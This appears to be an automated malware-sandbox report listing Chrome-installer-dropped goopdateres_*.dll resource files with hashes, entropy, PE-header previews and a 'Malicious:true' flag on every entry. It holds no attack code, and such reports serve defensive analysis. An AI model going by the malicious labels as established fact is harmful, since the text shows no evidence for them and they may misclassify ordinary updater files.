                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................_!....@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.835993668654925
                                      Encrypted:false
                                      SSDEEP:384:sm65M6Ac6AbEcXwwExiIYi6y2eFAM+o/8E9VF0NynDWM:sh5M6Ac6AbEcXwwOvYi6yVAMxkEFWM
                                      MD5:8D62D3B71591FCB40F59B6D0F651614D
                                      SHA1:2C7B1831CEAD9E2ACB85CEBAF1C2C53784476F38
                                      SHA-256:AD368CA65DB3E0A9417634D6BD2AC81C38858F875C1CDC6D641C2389B99D5A59
                                      SHA-512:9AD0A199148EB21927C1EE3976FDE7BE2968063955B1A5526FE18B62BC12C3B4D6E2D7DAD7B5B1E8F76937733AE4A38289A32BCEBFE60AB50F0F80648CE80711
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................+....@.............................I....0..(....@..pu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...pu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.60146588810046
                                      Encrypted:false
                                      SSDEEP:384:gJxvNeXz1J2zMB5qBL/vogIYi6yg/zAM+o/8E9VF0NyOf:cxA5IL/vwYi6ycAMxkEs
                                      MD5:B9114CC4DE1128C5156E3AFC7F8123F0
                                      SHA1:FF0FE96553ADE4200D68305DD2E694DC91A2995D
                                      SHA-256:2846C112A3F0A3C6B050FBAC7EA96DD3733F117068A5CCCC8B6CF16EDE9D4C47
                                      SHA-512:3BB6519556CEF59D91AD92E11987AE6A36C9436CEE5FE79B2A08B24FBBC04207C1114D466C0DC05F63221B368CD13B818B0C87188FEB2511716A2AD75675A478
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................%.....@.............................I....0..(....@..@v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.633426748227514
                                      Encrypted:false
                                      SSDEEP:768:sg7U7oPX1C2TycfBwGFTbeSNp6931lBVZpOAy3FGVsLVYi6yLAMxkEY:sg7U7e1C2TzpwGFTbnp6d1lBVZ8Ay3Fa
                                      MD5:5601A611F2801A57025AC0F6725CE7E3
                                      SHA1:BD2F8D12A70B19546ADFD22FE6A590A4274D2669
                                      SHA-256:BD765A07250856C9ECB5A8319F04B9BDF4D2251827324AB5066B3D731B18AC18
                                      SHA-512:41EA26924EBF780E5D91FF8E5383D31B04076197B43BA964860556484B845E0590BF4CD805876CAFB7CFB3082002CB35454BFC34C55E17113D9778A73182BC38
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................}....@.............................I....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.58142334402398
                                      Encrypted:false
                                      SSDEEP:384:2Cmm5juSkAHqQ3lbZe2E9RyrUxFIYi6yKSkAM+o/8E9VF0NyRpZ:2pjARwxyYi6ysAMxkE3
                                      MD5:E8706AF39491F7A579A4A03D7E97EE86
                                      SHA1:2F0CB0DE6A34F368803003BC33F260137741D525
                                      SHA-256:15DBAD35E7FA0DCF3AC2F08ADBFB56981E3365F91D801C71F913FC0AB7C4CB52
                                      SHA-512:B3544F99CBFD0DEC7BD2B9169364CB2DAAC8AA388F24F27862DE71E4BCF40A24AE42900510AAD30CDCFDDD0594B62083CE67C9B573C8FE3A3055873FFAB7297A
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ...........................................@.............................I....0..(....@..8r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...8r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.628156730390217
                                      Encrypted:false
                                      SSDEEP:768:yh6iBA06DkU3QF5EefV3oTYi6yEAMxkENd:yh6iBA06DkU3ubfVQ7qx5d
                                      MD5:D9BD75AD7A3A353CEE9C40044CE5B794
                                      SHA1:5CFAE92B010C7F15C0DE3FAA2D556501077EBA6C
                                      SHA-256:569AE0A08A78A956848B5A468247A02A0A0917657DE3DFD17EBD67CFC929F38D
                                      SHA-512:256C11F9C5ADC1EFB11A3EB0807226AFE72BDF02E6657104001B11C12961ACCD2E9CE4B7C6F8EC8DC577F8B25D6049F18F143786F2B9B5B2B9B6F14BB480B7EE
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ .......................................e....@.............................I....0..(....@...s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.577077407328838
                                      Encrypted:false
                                      SSDEEP:384:3DIArIn+sdB3LzIYi6yuAuAM+o/8E9VF0Ny1G:UwIn+m3L8Yi6yYAMxkEC
                                      MD5:49A37B39ED5F6FC7F8ED271AFB7B4B00
                                      SHA1:E688384442CF0C87D95AFE2DD4AC9219E2AC6862
                                      SHA-256:D6A2194ED9FC11CF4EE229D6282225E732594C345B3A948D78E1E25287E2BB92
                                      SHA-512:D75608306A0B44A1A6C8264804FC77DDA034A83A2E1198A982A388B99E595687AA2B1C34D49F4EBC92B05F4932319EB0F66CAA5D749E1A8F0B33B51A379367AA
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..@z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):41760
                                      Entropy (8bit):4.801857148906621
                                      Encrypted:false
                                      SSDEEP:384:AUmv7kdVe4DyCc53iKRlIYi6y7ieM1AM+o/8E9VF0NyIDz:56SqRSYi6ybyAMxkEc
                                      MD5:7C89D57D66E73D8F09EBAFA1733E61C2
                                      SHA1:D2CDF93717DA261437A841DC7BEA321DDA20736A
                                      SHA-256:936CA4058D17CEFF0AD72FFD721EC87E76A7DF8066FB10110A8AE7BF311D5C27
                                      SHA-512:205EAE74837C601E459BA5D7A994F3BA76B279CA67FFC8D694D9B75BAF72BEDAF72F18443417010C19FD3C97560AA7C1284B319A738AFEA5A2402D7763FB1674
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........t......h........ .......................................5....@.............................I....0..(....@..(k...........z.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(k...@...l..................@..@.reloc.. ............x..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):40736
                                      Entropy (8bit):4.828241660597864
                                      Encrypted:false
                                      SSDEEP:384:lG4hEXjOBWcieIYi6yj4/AM+o/8E9VF0Nym:nhETOBWcizYi6ykAMxkE
                                      MD5:56C037987597E28377C43DF3FD64A2A0
                                      SHA1:1E769EF90A0C8C5BF3C4A6D4E4FF5897A4E1AB84
                                      SHA-256:D158B0A602FAFDA9A117AD6065ECAB3F02159EC1055ADBAC8979B311DB83E1C7
                                      SHA-512:B2982807011CC473842AA89AA425FCC504D91072E384246122EBDC33B56ECAFE16B746CF5206D2686412F90EE663B1545565CC050DDA600295AA8BB4FA0F6828
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........p......h........ ......................................2.....@.............................I....0..(....@...f...........v.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....f...@...h..................@..@.reloc.. ............t..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.911151318124229
                                      Encrypted:false
                                      SSDEEP:384:K8ZcsfWBBS4XIYi6yNc9AM+o/8E9VF0Ny+oV:Msf2k4YYi6yNcAMxkEZ
                                      MD5:78BA7D33500CFA4639519609F7CEDEC8
                                      SHA1:9B0D9C945917D61F8A0CAF2C3E11D0CB2C7E6C7F
                                      SHA-256:6C8C7692FCCE08684EAD91E0A68C09121E46E45C1AA5D30AA9342D9FF099A3E8
                                      SHA-512:F3E7ACBAAEE401A2A3B0A68DB88FBF6FB620940CFE2891D822F38EF18EE5739D0CE66D5F440EB8CCC1D336AC5A406BB668CA20EBA9FB494C0ADFF3BDE8C73D96
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..@{.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@{...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):39712
                                      Entropy (8bit):4.878653000724356
                                      Encrypted:false
                                      SSDEEP:384:kp4Szd3IY+N1vZ0YoRHgA12slxB4xR0kTY1M5tkOobIYi6yIjLAM+o/8E9VF0Ny6:44SVmAaPjvokYi6y8LAMxkEI
                                      MD5:5C8D844A20331D1753B38BABC1EC567E
                                      SHA1:EBF130FB8C1550D329AA2EB008780C2A8A69DC06
                                      SHA-256:2DA70429E0E6B931DA700861A2C0B416D9420C3973531EDEF460079FD2D95C8D
                                      SHA-512:0A27588C7F5791940AC4D8946533A1572D70F8C4FBDF0CE35A3C15A3AE56D77D2094B2B2C1ED4090BFAD4CE11488D616D5BEDFE6DC62BA32AB33714ABCE8EC65
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........l......h........ .......................................r....@.............................I....0..(....@...c...........r.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....c...@...d..................@..@.reloc.. ............p..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.623100744736137
                                      Encrypted:false
                                      SSDEEP:384:AGD3nc9eHz03T0R8C923FNIYi6ysTCyAM+o/8E9VF0NyD66J:TLckHz03T0R8C98aYi6yxyAMxkEs
                                      MD5:979DDD15D4625F2D9442308AC23B093E
                                      SHA1:41BDAF8E7930A788E72B2E8D812D3AD8CC9614D9
                                      SHA-256:546EC90E214472E91048428924AEA9853EB1A0BAEA8FCA9AF87F5B4640440078
                                      SHA-512:148E0C38279D1AE560713FA4C0F2BF1C0245B6971D71D7B4A2CF44C4D512AD1FC8A9CB33CE7554F4A4855CC0EF319C6E72784CB2C4B87B324990BA945C31EF9F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ......................................d.....@.............................I....0..(....@...r.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....r...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.65084058038331
                                      Encrypted:false
                                      SSDEEP:384:neF5yQOea2eubIYi6yOtwAM+o/8E9VF0NyT5mN:eVCukYi6yBAMxkE3m
                                      MD5:DD5164441187CD34CF6B4571AD06B02F
                                      SHA1:12ACF5A1184C074EF04B52F2E855866B815FE61F
                                      SHA-256:DF49A28D88B5A20F2BD26FE17FD049A04BAA5C27C0C9D96203335C4EE52D4413
                                      SHA-512:C1BB517C682F211F6894C06810BF13079DABBC1912D8F6932746C0DC774B1AD836C21CB2E7F19F7575EB4BA989644F7806F13FCA2653DAB7B44960A567788A57
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................c....@.............................I....0..(....@...w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):47392
                                      Entropy (8bit):4.877833078833774
                                      Encrypted:false
                                      SSDEEP:384:bpuBJvfZigR8/JLpLIYi6yRblAM+o/8E9VF0Nyv:VkoJLp0Yi6yzAMxkE
                                      MD5:1A68C9A98363C381F08922F560250758
                                      SHA1:5C8FAB19A6FCE550C541DDAE84C1ED1EEB1D9A8F
                                      SHA-256:2A308897298977866C0199C137F679773ED63ED703B1286D07CF0E1DE45225F1
                                      SHA-512:C22490C4660BA897C34EAF2F1681B9EF713BB8DA72969DB4A462EC8F639EEF1A3403A7CBAFE8F86906D69A4C716E8D638CAF89AA9911996D1D1600B0659BCE07
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................;....@.............................I....0..(....@..H............... )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...H....@......................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.8496864323256945
                                      Encrypted:false
                                      SSDEEP:384:0sLcdCT73y7OiAEgUIYi6yj4yAM+o/8E9VF0NyVb:DLuCT73y7DTglYi6ybAMxkE7
                                      MD5:B7479D97664FF3F68883A4665AD46F03
                                      SHA1:FED7419A8408ADECD531D6F7E1A24BFBBB97A25B
                                      SHA-256:D8B54B04A01467927702A439F875DE02577721DA3D6B393FC9B6D5F81F0E363B
                                      SHA-512:3885C46F4763961AC41ECF4E33EF67F560B14672087894BC0D72B6FDF1E73FEECC5A4990F0DF52759032085AE4B9CF918355010954166614B18E3CFED2E82645
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..(y.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(y...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.589952680264056
                                      Encrypted:false
                                      SSDEEP:384:mmlvqFCrRLtUv6odpayK/YjfZ/fbMwTRlREFTIYi6yacH58GAM+o/8E9VF0NyW:xkhf3TF8cYi6yj58GAMxkE
                                      MD5:7F3113DEF8E50C086BBE84273477BAD4
                                      SHA1:F29165A7988ED9B46FA162B02CBC58E3BAF9DC8D
                                      SHA-256:60821A3672D3170F4D2E230E4C72AA3FEF58CDEEA16D0AF22B5C2077BD76750A
                                      SHA-512:3FB6F5EA722E81CCFBAF01110FA341F8299A81B71AE072F52D11E2C8B3BCF202175F9C8E176C289AEAC9D405D9919E406AE75929A942B52F49CC52A0858611DD
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ......................................+.....@.............................I....0..(....@..0s.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...0s...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.581801220672784
                                      Encrypted:false
                                      SSDEEP:384:MSnTcrh3Ne1sIYi6yTosAM+o/8E9VF0NyxyCA:rng/e19Yi6yksAMxkEaCA
                                      MD5:092DF8FBD33220A72D1A81745CD61722
                                      SHA1:16EE50224DC792A144DD8445C1B1017F0B22D252
                                      SHA-256:001666EAD47D5EFA71CCFA9818269E137F0C4AD90F32D758A9E6D9BC4560BB9D
                                      SHA-512:D2DA63CFB76879745DE3D2B537673F584BD2F28FCA9582A8476F78B69AE0CAA156085B61C33F03737748B942A1196EC0F1A4628766AD85AD6DE60C6D68CB5EA2
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@..(x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...(x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.60783079649953
                                      Encrypted:false
                                      SSDEEP:384:Yi5JZSiyCSiy4DVqeAYiTv4yywQP+IYi6ynuAM+o/8E9VF0Nymm:vDVmYGAyBQPTYi6yuAMxkE9
                                      MD5:9EFB18E27E49361B5CA0FE4EEBB286B2
                                      SHA1:7E522BEABDE6AD87AEC419F4C26395C64D8382A8
                                      SHA-256:3C066FF77D407AD1547372027F0C569FF65B06F1A5E34ED578AB9E6B87CE4876
                                      SHA-512:5C034C37801CEA6FA3219D24F81B62BD416E4CE2E9102285BE34ADE76D80ED0229D7951C8B4626E2AA602991A8BA5424C2409A50F9DC8909D335A84D6BCCC52B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@..hu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...hu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.647423060191508
                                      Encrypted:false
                                      SSDEEP:384:X6hn7KZHWCE1UuGp6ZMIYi6ybue8LAM+o/8E9VF0Nyxw3:qxyLEGUZdYi6yaVLAMxkEc
                                      MD5:355FE9CE9DB81686DB356A30C17212A4
                                      SHA1:6EB7892A5AB482F9F2E4C91DC12700E1E0EEFFAC
                                      SHA-256:5A6D70DA9A5EBAE1D28D8FA97EC40E40B271D5386648A5D00E28D49FD41A2BB0
                                      SHA-512:B76653623BBEF763639AB79F75173811962727B677BFD359952224D61A4537F8EC8067CE9281145F1500D68B4133792C1A03BEAE9708067D3A57BF2138E63D9B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................z....@.............................I....0..(....@.. w.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc... w...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.611879668618853
                                      Encrypted:false
                                      SSDEEP:384:Bafhcxr/vX88kIYi6yazaAM+o/8E9VF0Nykk:I5ms8VYi6yLAMxkEZ
                                      MD5:9DD85190C1CA43E4EA964F6695F34865
                                      SHA1:F0C597A48312D55A6B820EEEA05747B99D815A96
                                      SHA-256:EE5403A3EA60D3308D4999E6092AA4AD80FEC2A90A701E7EDE44F29298C48737
                                      SHA-512:3BA6B4143DFD3BE9F9F5CF4D80E54F99BC68976F7BB662F97BCCC80BC1789494A35FA958921589D65131D5CB1784FD09C48F7BBE940CED165EF4B0DC9AFB998B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ .......................................\....@.............................L....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.613512051839508
                                      Encrypted:false
                                      SSDEEP:384:wOytst7KKEx+1GGBmVIYi6yNNkAM+o/8E9VF0NyQ0pYC:wCwxMGWmiYi6yAAMxkEHpr
                                      MD5:82EF6EC70333A490ACFA9E46680A5D50
                                      SHA1:7DEE942E0AF205B0D5E65A237FCB571602080D61
                                      SHA-256:21193D4BEEAD2B2D43AD2417219018803103B5E0DB94273005C0F480C3EF5D73
                                      SHA-512:C819BA1F42FBF11E446DCD2E4A51E9F2D607A941D0380768747286D0F8DCC7872FD76669F411A4A61E9E0417AAE4E2D6085611ABAE62777FEAC6E9A4E1CD6061
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ...........................................@.............................L....0..(....@...u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.619054468277444
                                      Encrypted:false
                                      SSDEEP:768:wzSCRNND67qGGQdVqbrI1naEpXuYi6y0AMxkEM:wzudVqPMaD76xY
                                      MD5:DD97A63DF7DDFC0ED38F09DCFB8F31F8
                                      SHA1:ED049D9162F9216EE6B440EDE178AF8AE489501C
                                      SHA-256:69333435AFBC6821A0F40497466F98FA8E20A10EE928B2A85EC711AC77D7442C
                                      SHA-512:F2B99A9FDE86C21BF99423D1686A0D9A7D4A064AE9B648346DB65EC071E86E6070B0BD72D24A2806A316108ED7CB9B1BDFE8713E1C8F661BD66EF5F540E1207C
                                      Malicious:true
